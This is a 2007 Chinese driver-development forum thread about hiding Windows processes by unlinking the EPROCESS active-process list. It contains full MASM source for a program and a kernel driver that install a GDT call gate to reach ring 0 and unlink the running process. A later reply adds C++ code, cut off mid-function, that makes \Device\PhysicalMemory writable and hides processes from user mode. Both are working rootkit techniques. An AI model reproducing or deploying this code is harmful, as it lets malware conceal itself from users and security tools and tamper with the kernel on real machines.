zjjmj2002

驱动小牛

注册日期2007-04-05
最后登录2016-01-09
粉丝0
关注0
积分15分
威望321点
贡献值0点
好评度224点
原创分1分
专家分0分

加关注写私信

阅读：6527回复：31

俺也来讲讲课，献献丑吧！

楼主^#

更多发布于：2007-04-06 10:37

  很多贴子都写过如何修改活动进程链来隐藏进程，但大多不说明原因，让别人知其然不知其所以然，今天俺来发个贴子献献丑。
大家可能使用过PsGetCurrentProcess函数来获取当前线程的EPROCESS，如果你反汇编这个函数的话，你一定会发现这可能是内核中最简单的一个函数了，只有三行：

mov eax, fs:0x00000124;

mov eax, [eax + 0x44];

ret

这么简单的代码也行？当然可以！Windows中有一个叫Kernel's Processor Control Block (KPRCB)，核心处理控制块)模块的好东东，它总是位于0xffdff120地址，它的数据结构也不复杂，双字指向一个地址，这个地址叫做ETHREAD块，0xffdff124指向当前线程的ETHREAD块，再下一个就是下个线程的ETHREAD块，简单吧，ETHREAD块的数据结构相对复杂，不过你只需要知道它的offset 0x44处为EPROCESS块的地址就可以了，这就是三行代码就可以得到当前线程的EPROCESS地址的原因！EPROCESS块中有个有趣的数据结构叫活动进程链，它只有两个双字，一个FlINK，一个BLINK，FLINK指向下一个EPROCESS块的FLINK地址，BLINK则指向上一个EPROCESS块的BLINK地址，要想隐藏进程的话，只需要把自己脱链就可以了，呵呵！

  mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址
  mov eax,[eax+44h] ;EPROCESS地址
  mov ecx,088h ;XP中活动进程链地址,NT下为0x98,2000下为0xA0,自己看着办吧！
  mov esi,dword ptr[eax+ecx] ;XP中FLINK
  mov edi,dword ptr[eax+ecx+4] ;BLINK

  mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK
  mov dword ptr[edi],esi ;FLINK放到前一个FLINK

以下是一个例子！

.386p
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include macros.asm
include masm32.inc
include debug.inc
include advapi32.inc
includelib debug.lib
includelib masm32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib advapi32.lib

.data

dwFileSize dd 0
hFile dd 0
hMemory dd 0
pMemory dd 0
FunBase dd 0b6a8h

tmp db 50 dup(90)
Callgt dd 0
   dw 353h

.data?

hInstance HINSTANCE ?
CommandLine LPSTR ?

.code
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
   LOCAL wc:WNDCLASSEX
   LOCAL msg:MSG
   LOCAL hwnd:HWND
   mov wc.cbSize,SIZEOF WNDCLASSEX
   mov wc.style, CS_HREDRAW or CS_VREDRAW
   mov wc.lpfnWndProc, OFFSET WndProc
   mov wc.cbClsExtra,NULL
   mov wc.cbWndExtra,NULL
   push hInst
   pop wc.hInstance
   mov wc.hbrBackground,COLOR_WINDOW+1
   mov wc.lpszMenuName,NULL
   mov wc.lpszClassName,CTXT("HIDE")
   invoke LoadIcon,NULL,IDI_APPLICATION
   mov wc.hIcon,eax
   mov wc.hIconSm,0
   invoke LoadCursor,NULL,IDC_ARROW
   mov wc.hCursor,eax
   invoke RegisterClassEx, addr wc
   INVOKE CreateWindowEx,NULL,CTXT("HIDE"),CTXT("HIDE"),\
   WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,\
   CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,\
   hInst,NULL
   mov hwnd,eax
   INVOKE ShowWindow, hwnd,SW_SHOWNORMAL
   INVOKE UpdateWindow, hwnd
   .WHILE TRUE
   INVOKE GetMessage, ADDR msg,NULL,0,0
   .BREAK .IF (!eax)
   INVOKE TranslateMessage, ADDR msg
   INVOKE DispatchMessage, ADDR msg
   .ENDW
   mov eax,msg.wParam
   ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
   LOCAL hdc:HDC
   LOCAL ps:PAINTSTRUCT
   LOCAL rect:RECT
   .IF uMsg==WM_CLOSE
   invoke DestroyWindow,hWnd
   invoke PostQuitMessage,NULL
   .ELSEIF uMsg==WM_PAINT
   invoke BeginPaint,hWnd, ADDR ps
   mov hdc,eax
   invoke GetClientRect,hWnd, ADDR rect
   invoke DrawText, hdc,CTXT("不用ICESWORD，你能看见俺吗？"),-1, ADDR rect, DT_SINGLELINE or DT_CENTER or DT_VCENTER
   invoke EndPaint,hWnd, ADDR ps
   .ELSE
   invoke DefWindowProc,hWnd,uMsg,wParam,lParam
   ret
   .ENDIF
   xor eax,eax
   ret
WndProc endp
_OpenSys proc


local hSCManager:HANDLE
local hService:HANDLE
local acDriverPath[MAX_PATH]:CHAR

   ; Open a handle to the SC Manager database
   invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
   .if eax != NULL
   mov hSCManager, eax

   push eax
   invoke GetFullPathName, CTXT("sys.sys",0), sizeof acDriverPath, addr acDriverPath, esp
   pop eax

   ; Register driver in SCM active database
   invoke CreateService, hSCManager, CTXT("sys",0), CTXT("System",0), \
   SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
   SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
   .if eax != NULL
   mov hService, eax
   invoke StartService, hService, 0, NULL
   ; Here driver beeper.sys plays its nice melody
   ; and reports error to be removed from memory
   ; Remove driver from SCM database
   invoke DeleteService, hService
   invoke CloseServiceHandle, hService
   .else
   invoke MessageBox, NULL, CTXT("Can't register driver.",0), NULL, MB_ICONSTOP
   .endif
   invoke CloseServiceHandle, hSCManager
   .else
   invoke MessageBox, NULL, CTXT("Can't connect to Service Control Manager.",0), \
   NULL, MB_ICONSTOP
   .endif
   ret

_OpenSys endp
start:

invoke _OpenSys



call fword ptr [Callgt] ;use callgate to Ring0!

mov eax,esp ;save ring0 esp
mov esp,[esp+4];->ring3 esp
push eax

pushfd
pushad

  mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址
  mov eax,[eax+44h] ;EPROCESS地址
  mov ecx,088h
  mov esi,dword ptr[eax+ecx] ;XP中FLINK
  mov edi,dword ptr[eax+ecx+4] ;BLINK

  mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK
  mov dword ptr[edi],esi ;FLINK放到前一个FLINK


popad
popfd

pop esp ;restore ring0 esp
push offset Exit
retf

Exit:
invoke _OpenSys
invoke Sleep,2 ;

   invoke GetModuleHandle, NULL
   mov hInstance,eax
   invoke GetCommandLine
   invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
   invoke ExitProcess,NULL
end start

附件名称/大小下载次数最后更新: HIDE.zip (3KB) 185 2007-04-06 10:37

喜欢2

最新喜欢：

TOMG20...

znsoft

管理员

注册日期2001-03-23
最后登录2023-10-25
粉丝300
关注6
积分910分
威望14796点
贡献值7点
好评度2410点
原创分5分
专家分100分

加关注写私信

沙发^#

发布于：2007-04-06 11:38

不错:) 赞一个

如果能用c改一下,估计更方便阅读和理解了:)

http://www.zndev.com 免费源码交换网 ----------------------------- 软件创造价值，驱动提供力量! 淡泊以明志，宁静以致远。 ---------------------------------- 勤用搜索，多查资料，先搜再问。

回复喜欢

xp4105

论坛版主

注册日期2006-04-02
最后登录2014-03-29
粉丝1
关注0
积分905分
威望570点
贡献值1点
好评度162点
原创分1分
专家分0分

加关注写私信

板凳^#

发布于：2007-04-06 11:56

写的挺好。不错不错。收藏。

时光如流水抓紧时间实现自我价值

回复喜欢

qiweixue 驱动小牛注册日期2004-07-21 最后登录2011-12-19 粉丝0 关注0 积分1006分威望274点贡献值0点好评度268点原创分1分专家分0分加关注写私信	地板^# 发布于：2007-04-06 12:59 很实用...
	回复(0) 喜欢(0)

tiaozi2000 驱动牛犊注册日期2005-01-26 最后登录2010-01-08 粉丝0 关注0 积分6分威望31点贡献值0点好评度21点原创分0分专家分0分加关注写私信	地下室^# 发布于：2007-04-07 14:22 sys.sys里做了什么呢？有代码看看吗？
	回复(0) 喜欢(0)

wangjianfeng 驱动小牛注册日期2004-05-28 最后登录2013-10-02 粉丝0 关注0 积分1002分威望263点贡献值0点好评度260点原创分0分专家分0分加关注写私信	5楼^# 发布于：2007-04-08 10:21 与FU的技术一样.
	回复(0) 喜欢(0)

zjjmj2002

驱动小牛

注册日期2007-04-05
最后登录2016-01-09
粉丝0
关注0
积分15分
威望321点
贡献值0点
好评度224点
原创分1分
专家分0分

加关注写私信

6楼^#

发布于：2007-04-08 11:24

引用第4楼tiaozi2000于2007-04-07 14:22发表的“”:
sys.sys里做了什么呢？有代码看看吗？

sys.sys只是负责生成一个调用门，代码如下：

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
; CallGate - Kernel Mode Driver
;
; Written by zjjmj2002 (zjjmj2002@tom.com)
;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.386
.model flat, stdcall
option casemap:none

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.code

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING

pushfd
pushad

push edx
sgdt [esp-2]
pop edx
mov eax,edx
mov ecx,350h

.if dword ptr [edx+ecx+2]!=0ec000358h
mov byte ptr [edx],0c3h
mov word ptr [edx+ecx],ax
shr eax,16
mov word ptr [edx+ecx+6],ax
mov dword ptr [edx+ecx+2],0ec000358h
mov dword ptr [edx+ecx+8],0000ffffh
mov dword ptr [edx+ecx+12],00cf9a00h
.endif

popad
popfd

mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
ret

DriverEntry endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

end DriverEntry

回复喜欢

killvxk

论坛版主

注册日期2005-10-03
最后登录2014-04-14
粉丝3
关注1
积分1082分
威望2003点
贡献值0点
好评度1693点
原创分2分
专家分0分

加关注写私信

7楼^#

发布于：2007-04-08 17:00

...无语～全是汇编～

没有战争就没有进步 X3工作组为您提供最好的军火

回复喜欢

musser 驱动牛犊注册日期2004-04-19 最后登录2010-12-09 粉丝0 关注0 积分3分威望8点贡献值0点好评度4点原创分0分专家分0分加关注写私信	8楼^# 发布于：2007-04-08 18:22 这种精神值得提倡，共同学习提高技术！
	回复(0) 喜欢(0)

zjjmj2002 驱动小牛注册日期2007-04-05 最后登录2016-01-09 粉丝0 关注0 积分15分威望321点贡献值0点好评度224点原创分1分专家分0分加关注写私信	9楼^# 发布于：2007-04-08 20:33 *引用第7楼killvxk于2007-04-08 17:00发表的“”*: ...无语～全是汇编～嘿嘿，俺职业又不是程序员，编程只是业余爱好，当然是什么顺手用什么乐。
	回复(0) 喜欢(0)

tiaozi2000 驱动牛犊注册日期2005-01-26 最后登录2010-01-08 粉丝0 关注0 积分6分威望31点贡献值0点好评度21点原创分0分专家分0分加关注写私信	10楼^# 发布于：2007-04-12 14:45 很感谢LZ，又学到一手。。。测试程序在WIN2K和WIN2K3上，蓝屏，死机。。。。 WINXP SP2正常，为什么呢？
	回复(0) 喜欢(0)

baigan 驱动牛犊注册日期2006-07-04 最后登录2011-10-21 粉丝0 关注0 积分140分威望17点贡献值0点好评度16点原创分0分专家分0分加关注写私信	11楼^# 发布于：2007-04-12 18:44 LS没仔细看LZ的文章
	回复(0) 喜欢(0)

softbiao 驱动牛犊注册日期2007-04-09 最后登录2008-08-26 粉丝0 关注0 积分240分威望26点贡献值0点好评度25点原创分0分专家分0分加关注写私信	12楼^# 发布于：2007-04-14 23:28 恩，很好，赞一个：）
	回复(0) 喜欢(0)

dge

驱动牛犊

注册日期2006-05-01
最后登录2009-05-21
粉丝0
关注0
积分410分
威望45点
贡献值0点
好评度44点
原创分0分
专家分0分

加关注写私信

13楼^#

发布于：2007-04-15 08:48

写的非常好,赞一个.

相信自己

回复喜欢

cppdev

驱动牛犊

注册日期2006-11-26
最后登录2009-01-11
粉丝0
关注0
积分300分
威望43点
贡献值0点
好评度42点
原创分0分
专家分0分

加关注写私信

14楼^#

发布于：2007-04-18 17:57

---------- nmake ----------

Microsoft (R) Program Maintenance Utility Version 6.00.8168.0
Copyright (C) Microsoft Corp 1988-1998. All rights reserved.

ml /c /coff hide.asm
Microsoft (R) Macro Assembler Version 6.15.8803
Copyright (C) Microsoft Corp 1981-2000. All rights reserved.

Assembling: hide.asm
hide.asm(110) : error A2136: too many arguments to INVOKE
hide.asm(110) : error A2208: missing left parenthesis in expression
hide.asm(110) : error A2114: INVOKE argument type mismatch : argument : 2
hide.asm(110) : error A2084: constant value too large
hide.asm(110) : error A2114: INVOKE argument type mismatch : argument : 1
hide.asm(114) : error A2136: too many arguments to INVOKE
hide.asm(114) : error A2208: missing left parenthesis in expression
hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 5
hide.asm(114) : error A2084: constant value too large
hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 4
hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 3
hide.asm(114) : error A2207: missing right parenthesis in expression
hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 2
hide.asm(126) : error A2136: too many arguments to INVOKE
hide.asm(126) : error A2208: missing left parenthesis in expression
hide.asm(126) : error A2114: INVOKE argument type mismatch : argument : 3
hide.asm(126) : error A2084: constant value too large
hide.asm(126) : error A2114: INVOKE argument type mismatch : argument : 2
hide.asm(130) : error A2136: too many arguments to INVOKE
hide.asm(130) : error A2208: missing left parenthesis in expression
hide.asm(130) : error A2114: INVOKE argument type mismatch : argument : 3
hide.asm(130) : error A2084: constant value too large
hide.asm(130) : error A2114: INVOKE argument type mismatch : argument : 2
NMAKE : fatal error U1077: 'ml' : return code '0x1'
Stop.
Normal Termination

回复喜欢

mycro

驱动牛犊

注册日期2006-02-23
最后登录2016-01-09
粉丝0
关注0
积分211分
威望32点
贡献值0点
好评度21点
原创分0分
专家分0分

加关注写私信

15楼^#

发布于：2007-04-26 15:55

引用第14楼cppdev于2007-04-18 17:57发表的“”:
---------- nmake ----------

Microsoft (R) Program Maintenance Utility Version 6.00.8168.0
Copyright (C) Microsoft Corp 1988-1998. All rights reserved.

.......

----------------------------------------------
这种错误还是自己搞定，不是人家代码的问题，
楼主没义务，帮你做这么简单而繁琐的事情

回复喜欢

zvarlet 驱动牛犊注册日期2007-02-11 最后登录2007-05-03 粉丝0 关注0 积分10分威望2点贡献值0点好评度1点原创分0分专家分0分加关注写私信	16楼^# 发布于：2007-04-27 12:00 汇编,看不懂...
	回复(0) 喜欢(0)

ks12345

驱动小牛

注册日期2006-09-21
最后登录2016-01-09
粉丝0
关注0
积分7分
威望223点
贡献值0点
好评度189点
原创分0分
专家分0分

加关注写私信

17楼^#

发布于：2007-04-27 18:25

好吧，我把我的应用层实现贴出来：）
// HideProcess.cpp: implementation of the CHideProcess class.
//进程隐藏程序
// 要隐藏时调用HideProcess即可
//////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
   NTSTATUS Status;
   ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
   USHORT Length;
   USHORT MaximumLength;
   PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
   ULONG Length;
   HANDLE RootDirectory;
   PUNICODE_STRING ObjectName;
   ULONG Attributes;
   PVOID SecurityDescriptor;
   PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//
// SYSTEM_INFORMATION_CLASS
//
typedef enum _SYSTEM_INFORMATION_CLASS
{
   SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16
//
typedef struct _SYSTEM_HANDLE_INFORMATION
{
   ULONG ProcessId;
   UCHAR ObjectTypeNumber;
   UCHAR Flags;
   USHORT Handle;
   PVOID Object;
   ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
   OUT PHANDLE SectionHandle,
   IN ACCESS_MASK DesiredAccess,
   IN POBJECT_ATTRIBUTES ObjectAttributes
   );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
   IN OUT PUNICODE_STRING DestinationString,
   IN PCWSTR SourceString
   );

typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) (
   IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
   IN OUT PVOID SystemInformation,
   IN ULONG SystemInformationLength,
   OUT PULONG ReturnLength OPTIONAL
   );

RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------

BOOL CHideProcess::m_bInit = FALSE;
CHideProcess CHideProcess::m_NoAction;
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////

CHideProcess::CHideProcess()
{
   m_bInit = InitNTDLL();
}

CHideProcess::~CHideProcess()
{
   CloseNTDLL();
}

// load dll and get functions
BOOL CHideProcess::InitNTDLL()
{
   // load dll
   if (NULL == g_hNtDLL)
   {
   g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
   if (NULL == g_hNtDLL)
   {
   return FALSE;
   }
   }

   // get functions
   RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
   ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
   ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
   if ((RtlInitUnicodeString == NULL)
   || (ZwOpenSection == NULL)
   || (ZwQuerySystemInformation == NULL))
   {
   return FALSE;
   }

   m_bInit = TRUE;
   return TRUE;
}
//---------------------------------------------------------------------------
VOID CHideProcess::CloseNTDLL()
{
   if (NULL != g_hNtDLL)
   {
   FreeLibrary(g_hNtDLL);
   g_hNtDLL = NULL;
   m_bInit = FALSE;
   }
}
//---------------------------------------------------------------------------
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
   PACL pDacl = NULL;
   PSECURITY_DESCRIPTOR pSD = NULL;
   PACL pNewDacl = NULL;

   DWORD dwRes = GetSecurityInfo(
   hSection,
   SE_KERNEL_OBJECT,
   DACL_SECURITY_INFORMATION,
   NULL,
   NULL,
   &pDacl,
   NULL,
   &pSD
   );

   if(ERROR_SUCCESS != dwRes)
   {

   if(pSD)
   LocalFree(pSD);
   if(pNewDacl)
   LocalFree(pNewDacl);
   }

   EXPLICIT_ACCESS ea;
   RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
   ea.grfAccessPermissions = SECTION_MAP_WRITE;
   ea.grfAccessMode = GRANT_ACCESS;
   ea.grfInheritance= NO_INHERITANCE;
   ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
   ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
   ea.Trustee.ptstrName = "CURRENT_USER";

   dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

   if(ERROR_SUCCESS != dwRes)
   {

   if(pSD)
   LocalFree(pSD);
   if(pNewDacl)
   LocalFree(pNewDacl);
   }
   dwRes = SetSecurityInfo(
   hSection,
   SE_KERNEL_OBJECT,
   DACL_SECURITY_INFORMATION,
   NULL,
   NULL,
   pNewDacl,
   NULL
   );

   if(ERROR_SUCCESS != dwRes)
   {
   if(pSD)
   LocalFree(pSD);
   if(pNewDacl)
   LocalFree(pNewDacl);
   }

}
//---------------------------------------------------------------------------
HANDLE CHideProcess::OpenPhysicalMemory()
{
   NTSTATUS status;
   UNICODE_STRING physmemString;
   OBJECT_ATTRIBUTES attributes;
   ULONG PhyDirectory;

   g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx (&g_osvi);

   if (5 != g_osvi.dwMajorVersion)
   return NULL;

   switch(g_osvi.dwMinorVersion)
   {
   case 0:
   PhyDirectory = 0x30000;
   break; // 2k
   case 1:
   PhyDirectory = 0x39000;
   break; // xp
   case 2:
   PhyDirectory = 0x39000;
   break; // 2k03
   default:
   AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
   TFileTrace(_T("init PhysicalMemory: Unknown version...\n"));
   return NULL;
   }

   RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

   attributes.Length = sizeof(OBJECT_ATTRIBUTES);
   attributes.RootDirectory = NULL;
   attributes.ObjectName = &physmemString;
   attributes.Attributes = 0;
   attributes.SecurityDescriptor = NULL;
   attributes.SecurityQualityOfService = NULL;

   status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

   if(status == STATUS_ACCESS_DENIED)
   {
   status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
   SetPhyscialMemorySectionCanBeWrited(g_hMPM);
   CloseHandle(g_hMPM);
   status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
   }

   if(!NT_SUCCESS(status))
   {
   AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed..."));
   TFileTrace(_T("Open section: \\Device\\PhysicalMemory failed...\n"));
   return NULL;
   }

   TFileTrace(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory);
   g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection
   g_hMPM, // handle
   FILE_MAP_READ|FILE_MAP_WRITE,
   0, // offset high part
   PhyDirectory, // offset low part
   0x1000 // size
   );

   if( g_pMapPhysicalMemory == NULL )
   {
   AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
   TFileTrace(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
   return NULL;
   }

   return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
   ULONG VAddr = (ULONG)addr;
   ULONG PGDE = BaseAddress[VAddr>>22];
   ULONG PTE;
   ULONG PAddr;

   if (0 == (PGDE & 1))
   return 0;

   ULONG tmp = PGDE & 0x00000080;

   if (0 != tmp)
   {
   PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
   }
   else
   {
   TFileTrace(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000);
   PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
   PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

   if (0 == (PTE&1))
   return 0;

   PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
   UnmapViewOfFile((PVOID)PGDE);
   }

   return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG CHideProcess::GetData(PVOID addr)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   TFileTrace(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"),
   g_pMapPhysicalMemory, addr, phys);
   TFileTrace(_T("GetData() OffSet: %p\n"), phys & 0xfffff000);
   PULONG tmp = (PULONG)MapViewOfFile(
   g_hMPM,
   FILE_MAP_READ|FILE_MAP_WRITE,
   0,
   phys & 0xfffff000, // offset low part
   0x1000 // size
   );

   if (0 == tmp)
   return 0;

   ULONG ret = tmp[(phys & 0xFFF)>>2];
   UnmapViewOfFile(tmp);

   return ret;
}
//---------------------------------------------------------------------------
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   TFileTrace(_T("SetData() OffSet: %p\n"), phys & 0xfffff000);
   PULONG tmp = (PULONG)MapViewOfFile(
   g_hMPM,
   FILE_MAP_WRITE,
   0,
   phys & 0xfffff000,
   0x1000
   );

   if (0 == tmp)
   return FALSE;

   tmp[(phys & 0xFFF)>>2] = data;
   UnmapViewOfFile(tmp);

   return TRUE;
}
//---------------------------------------------------------------------------
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
   ExitProcess(0);
   return 1 ;
}
//*/
//---------------------------------------------------------------------------
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
   NTSTATUS status;
   PVOID buf = NULL;
   ULONG size = 1;
   ULONG NumOfHandle = 0;
   ULONG i;
   PSYSTEM_HANDLE_INFORMATION h_info = NULL;
   DWORD dwCurrentID = GetCurrentProcessId();
   // TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID);

   // LocateNtdllEntry( );
   //打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5
   HANDLE hProc = OpenProcess(
   // PROCESS_ALL_ACCESS,
   PROCESS_QUERY_INFORMATION,
   FALSE,
   PID // GetCurrentProcessId() //
   );
   if (NULL == hProc)
   {
   TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
   TFileTrace(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
   return 0;
   }

   for ( size = 1024; ; size *= 2 )
   {
   if ( NULL == ( buf = calloc( size, 1 ) ) )
   {
   TRACE( _T("calloc( %u, 1 ) failed\n"), size );
   TFileTrace(_T("calloc( %u, 1 ) failed\n"), size );
   if ( buf != NULL )
   {
   free( buf );
   buf = NULL;
   }
   CloseHandle(hProc);
   return 0;
   }
   status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
   if ( !NT_SUCCESS( status ) )
   {
   if ( STATUS_INFO_LENGTH_MISMATCH == status )
   {
   free( buf );
   buf = NULL;
   continue;
   }
   else
   {
   TFileTrace( "ZwQuerySystemInformation() failed\n");
   TRACE( "ZwQuerySystemInformation() failed\n");
   if ( buf != NULL )
   {
   free( buf );
   buf = NULL;
   }
   CloseHandle(hProc);
   return 0;
   }
   }
   else
   {
   break;
   }
   } /* end of for */

   //返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组
   NumOfHandle = *((PULONG)buf);

   h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4);

   for(i = 0; i < NumOfHandle; i++)
   {
   if(h_info.ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
   {
   // TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"),
   // PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
   if (h_info.Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
   {
   // TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"),
   // PID, hProc, h_info.Object);
   DWORD dwRet = (DWORD)(h_info.Object);
   if (buf != NULL)
   {
   free( buf );
   buf = NULL;
   }
   CloseHandle(hProc);
   return dwRet;
   }
   }
   }

   if ( buf != NULL )
   {
   free( buf );
   buf = NULL;
   }
   CloseHandle(hProc);
   return 0;
}

// 隐藏进程主函数
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
   //
   if (!m_bInit)
   {
   AfxMessageBox(_T("load NTDLL failed..."));
   TFileTrace(_T("load NTDLL failed...\n"));
   return FALSE;
   }

   // 获得指向进程的 EPROCESS 数据块的指针
   ULONG process = (ULONG)GetEprocessFromPid(dwID);
   if (process == 0)
   {
   //
   TFileTrace(_T("GetEprocessFromPid() failed...\n"));
   return FALSE;
   }
   TFileTrace(_T("GetEprocessFromPid() process = %p...\n"), process);

   // 这个是打开对应的系统内存，并且映射为一个核心对象
   if (NULL == OpenPhysicalMemory())
   {
   AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
   TFileTrace(_T("OpenPhysicalMemory() failed...\n"));
   return FALSE;
   }
   //
   // 下面的两个 if 完成对 Windows 的系统版本判断（只判断了2K和XP），
   // 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置
   ULONG fw, bw;
